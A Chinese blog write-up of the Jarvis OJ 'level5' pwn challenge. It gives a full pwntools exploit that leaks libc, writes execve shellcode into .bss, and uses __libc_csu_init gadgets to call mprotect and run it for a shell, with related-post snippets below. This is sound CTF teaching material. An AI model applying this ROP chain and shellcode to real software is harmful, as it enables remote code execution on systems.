Javris OJ - pwn level5(mmap和mprotect练习)(_libc_csu_init中的通用gedget的使用)

最新推荐文章于 2024-02-25 17:42:44 发布
最新推荐文章于 2024-02-25 17:42:44 发布
阅读量1.7k 收藏 5
点赞数
分类专栏: CTF解题 Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanqdi_/article/details/104274118
版权

pwn level5

这个题和level3-64的附件一样,level5要求不用system和execve,而是用mprotect和mmap,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。

可以这样做:利用shellcode,利用read函数把shellcode写入bss段,这里要求写入的bss段是可执行的。但是这道题目中的bss 段是不可执行的。
这里就用mprotect来修改权限:Linux中mprotect()函数的用法

思路:泄漏write地址-》获得libc版本-》把shellcode写入bss段-》获得mprotect函数地址并修改bss段的权限-》执行bss段里的shellcode。

这里不免要构造ROP链,但是找到合适的pop rdi等的指令总是不如意,所以这里用到了通用gedgat。
在这道题目中像read,write,mprotect 函数都需要三个参数,在64位系统中,在调用函数时,其前六个参数是在rdi,rsi,rdx,rcx,r8,r9中取的,这道题目中只有rdi,rsi的片段,rdx的值不能控制,所以这里就用到了通用的gedget。

0x01 通用gedget

我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。这个函数是用来对 libc 进行初始化操作的,而一般的程序都会调用 libc 函数,所以这个函数一定会存在。我们先来看一下这个函数 (当然,不同版本的这个函数有一定的区别)。(在IDA中的函数列表中可以找到这个函数,看一下汇编代码)
在这里插入图片描述
红框中的就是我们要利用的gedget。
调用4006A6可以对rbx,rbp,r12,r13,r14,r15进行赋值,再通过调用400690函数,分别对rdx,rsi,edi,进行赋值,通过控制r12,rbx的值,可以调用想要调用的函数,比如r12=0,rbx=0x10000,则在call处,调用0x10000处的函数。

0x02 泄漏write地址并得出libc版本

和level3一样,因为rbx的值为0x200,大于8,所以可以不对rbx进行赋值。即write的第三个参数可以不管。write(1,write_got,8)是把write_got地址指向内存的内容的前8个字节写入到标准输出流中。

write_plt = 0x00000000004004B0
write_got = 0x0000000000600A58
read_plt = 0x00000000004004C0
vul_addr = 0x00000000004005E6

rdi = 0x00000000004006b3
rsi_r15 = 0x00000000004006b1

payload = 'a'*0x80+'b'*0x8  #padding
payload += p64(rdi)+p64(0x01) #write的第一个参数
payload += p64(rsi_r15)+p64(write_got)+p64(0) #write第二个参数和弹入r15的垃圾数据
payload += p64(write_plt)+p64(vul_addr)#调用write函数以及write函数的返回地址

r.recvuntil("Input:\n")
r.sendline(payload)
write_addr = u64(r.recv(8))
print hex(write_addr)

0x03 把shellcode写入bss段

bss_addr=e.bss()
read_plt=e.symbols['read']
payload2='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(bss_addr)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload2)
shell_code='\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
p.send(shell_code)

看的别人的wp,有个疑问:read的第三个参数不需要指定吗?是默认取rbx中的值吗?

0x04 得到mprotect的地址,并把mprotect和bss的地址写入got列表

因为要调用mprotect和bss,要调用程序中没有的函数,要把其地址写入got列表,写入got表所在地址可以在ida中查看,即空的地址。
程序的got表:
在这里插入图片描述
在ida中找空的got表地址
在这里插入图片描述
脚本:

###########write bss to got table
bss_got= 0x0000000000600A48
payload3='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(bss_got)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload3)
p.send(p64(bss_addr))

###########write mpro to got table
offset=write_addr-libc.symbols['write']
mprot_got= 0x0000000000600A50
mprot_addr=libc.symbols['mprotect']+offset
payload4='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(mprot_got)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload4)
p.send(p64(mprot_addr))

0x05 修改bss权限,并执行bss的内容

payload5='a'*0x88+p64(0x4006A6)+"ret_addr" + p64(0) + p64(1) +p64(mprot_got) + p64(7) +p64(0x1000)+p64(0x600000)
payload5 += p64(0x400690)
payload5 += "ret_addr" + p64(0) + p64(1) + p64(bss_got) + p64(0) + p64(0) + p64(0)
payload5 += p64(0x400690)

在这里插入图片描述

payload5=‘a’*0x88+p64(0x4006A6)+“ret_addr” + p64(0) + p64(1) +p64(mprot_got) + p64(7) +p64(0x1000)+p64(0x600000)

第一步padding+return addr设为0x4006a6,调用该函数,然后是该函数的返回地址,后边是分别向对应的寄存器中存值,rbx=0, rbp=1, r12=mprot_got, r13=7, r14=0x1000, r15=0x600000, 因为要调用mprotect 函数进行修改权限,在400690函数中要给rdx,rsi,edi,r12,rbx赋值,所以把rbx设为0,r12设为要调用的函数地址。

mprotect的三个参数为(strat_addr,len,prot)mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值,这里从0x600000开始,包括bss段的地址即可,长度为0x1000为一个page,mprotect是以page为单位的,权限为可执行7。

注意值与寄存器的对应。

这里想要执行bss段里的shllcode,就要重新设置r12的值,即需要再次调用4006a6函数,可以通过设置rbp的值,在400690中,rbp设置为1,即可再次调用4006a6函数。

payload5 += p64(0x400690)+“ret_addr” + p64(0) + p64(1) + p64(bss_got) + p64(0) + p64(0) + p64(0)
payload5 += p64(0x400690)

这里400690是把4006a6中的值赋值给相应寄存器,在次执行4006a6,给相应寄存器赋值,再调用400690执行shellcode,获取shell。

0x06 脚本

from pwn import*
context.log_level = "debug"
p=remote('pwn2.jarvisoj.com',9884)
e = ELF("./level3_x64")
libc = ELF("./libc-2.19.so")
######### leak
write_plt = e.plt["write"]
write_got = e.got["write"]
vul_addr = e.symbols["vulnerable_function"]
rdi = 0x00000000004006b3
rsi_r15 = 0x00000000004006b1

payload1 = 'a'*0x88+p64(rdi)+p64(1)+p64(rsi_r15)+p64(write_got)+'a'*8+p64(write_plt)+p64(vul_addr)
p.recvline()
p.send(payload1)
tmp=p.recv(8)
write_addr=u64(tmp[0:8])
print hex(write_addr)

offset=write_addr-libc.symbols['write']
########### read shell code to bss
bss_addr=e.bss()
read_plt=e.symbols['read']
payload2='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(bss_addr)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload2)
shell_code='\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
p.send(shell_code)

###########write bss to got table
bss_got= 0x0000000000600A48
payload3='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(bss_got)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload3)
p.send(p64(bss_addr))

###########write mpro to got table
mprot_got= 0x0000000000600A50
mprot_addr=libc.symbols['mprotect']+offset
payload4='a'*0x88+p64(rdi)+p64(0)+p64(rsi_r15)+p64(mprot_got)+'a'*8+p64(read_plt)+p64(vul_addr)
p.recvline()
p.send(payload4)
p.send(p64(mprot_addr))

########### jmp to __libc_csu_init to call shellcode
payload5='a'*0x88+p64(0x4006A6)+"ret_addr" + p64(0) + p64(1) +p64(mprot_got) + p64(7) +p64(0x1000)+p64(0x600000)
payload5 += p64(0x400690)
payload5 += "ret_addr" + p64(0) + p64(1) + p64(bss_got) + p64(0) + p64(0) + p64(0)
payload5 += p64(0x400690)
p.recvline()
p.send(payload5)
sleep(5)
p.interactive()

0x07 参考

  • https://blog.csdn.net/qq_38204481/article/details/80984318
  • https://blog.csdn.net/weixin_41617275/article/details/84955439
123111234
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
mmap函数和mprotect函数
蓝旭晨枫╮
04-06 2674
include void *mmap(void *addr, //用于指定映射存储区的起始地址,通常设置为0,表示让操作系统选择该映射区的起始地址。此函数的返回地址是映射区的起始地址。 size_t len, //映射的字节数 int plot, //对映射区的保护要求 1、PROT_READ(映射区可读) 2、PROT_WRITE(映射区可写) 3、PROT_EXEC(
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2028
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
[VNCTF2024]-PWN:shellcode_master解析(orw,用mmap代替read读文件)
最新发布
2301_79326813的博客
02-25 710
查看保护查看ida在sandbox函数,函数先使用了seccomp_init初始化,允许了所有系统调用,再用seccomp_rule_add来禁用掉了部分系统调用,其包括execve和readseccomp_init函数可以进行系统调用全禁用和全允许初始化seccomp_rule_add函数可以运行或禁用部分系统调用题目很明显地提示要使用shellcode,我们可以使用两种方式去编写shellcode。
pwn 学习笔记 暑假第九天 __libc_scu_init
SsMing的博客
07-21 663
__libc_scu_init 这个函数是用来对libc进行初始化操作的 在64位的程序,前六个参数是通过寄存器传递的,之后再多的才是分布在栈上 如果程序比较小,很难找到需要的可用的gadget 但是如果利用这个函数,可以利用栈溢出构造栈上数据控制rbx,rbp,r12,r13,r14,r15寄存器的值 前六个参数依次保存在 RDI    (可控的其实只是RDI的第32位,就是EDI)...
Javris oj -pwn tell me something
hanqdi_的博客
02-04 581
pwn - tell me something 修改权限:chmod 777 guestbook 检查保护机制:checksec guestbook 64位文件,开启堆栈不可执行保护,不能往堆栈里写入shellcode解题。 用64位ida打开guestbook,找漏洞点 from pwn import * r=remote('pwn.jarvisoj.com',9876) pay...
[BUUCTF]PWN——[BSidesCF 2019]Runit(mmap+shellcode)
mcmuyanga的博客
04-12 499
[BSidesCF 2019]Runit 例行检查,32位程序,开启了nx保护 运行一下看看大概的情况 ida载入 虽然开了nx,但是buf用mmap映射了地址,可读可写可执行,直接传入shellcode,15行调用了buf,运行shellcode获取shell。 exp from pwn import * p=remote("node3.buuoj.cn",25055) context.arch="i386" shellcode=asm(shellcraft.sh()) p.sendlin
hdu-page-11-answer.rar_hdu_hdu oj第十一页_page_搜题_杭电oj
09-14
杭电OJ是在线进行算法练习和比赛的平台,包含多种难度级别的题目,适合不同水平的编程爱好者。每个题目都有详尽的输入输出格式说明和样例测试用例,提交代码后系统会立即给出运行结果,方便学习者及时调整和优化代码...
SM4.rar_OJ5_SM4 C++_sm4_国密_国密 SM4 使用
09-21
sm4国密加密,上穿使用下,关于C、C++实现。可用于vs..........................
What-is-the-highest-score.rar_What Is the What_华为OJ
09-24
在编程的世界里,竞赛编程和在线判断(Online Judge,简称OJ)系统是检验和提升编程技能的重要方式。华为OJ平台作为业界知名的在线编程挑战平台,吸引了众多程序员参与其,以解决各种复杂问题来锻炼自己的算法和...
UVaOJ-401(Palindromes).zip_401 Palindromes
09-22
标题的"UVaOJ-401(Palindromes)"表明这是一个关于解决UVa Online Judge(UVa OJ)上编号为401的编程挑战,该挑战的主题是"Palindromes",即回文串。回文串是指一个字符串无论从前读到后还是从后读到前都是相同的,...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
Pa1-3-2_oj_SuperExam_mooc_PA1-3_
10-02
某英语课共有n 位学生,每位学生都有一个属于自己的整数学号。注意这一次由于课程的扩容,学生的人数非常多。 现在这门英语课准备进行期末考试,考试的形式是:每个学生单独与老师进行一段时间的口语对话。...
pwn 进阶(1)
weixin_44113469的博客
02-07 905
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛复盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2394
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存分配,直到堆空间
pwn入门之mprotect函数的利用
wangxunyu6的博客
01-24 1134
所以payload的意思就是先调用mprotect函数通过pop将原本的参数覆盖为我们想要的参数,然后返回到read函数,然后pop弹掉read的参数,把第二个参数改为bss的地址,读入shellcode。通过gadget找到一个含有三个pop一个ret指令的地址,我们要通过这个指令将mprotect函数原来的参数pop走,让我们能够填入我们想要的参数.pop_ebx_esi_ebp_ret=0x80a019b然后就是构造payload了先上代码。这题是64位的所以着重讲一下pay的构造。
CTF-PWN level5(Jarvis Oj)
SuperGate的博客
05-16 812
level3_x64一样的文件,但是限制不能使用system和execv函数拿shell,但是可以用mmap和mprotect完成本题。 我尝试用mprotect来解决,首先mprotect的结构如下: int mprotect(const void *start, size_t len, int prot); 参数的含义是:把从start开始长度为len的内存区的保护属性修改为prot...
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1938
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 292
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
Pwn基础知识笔记
3569
12-15 4589
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值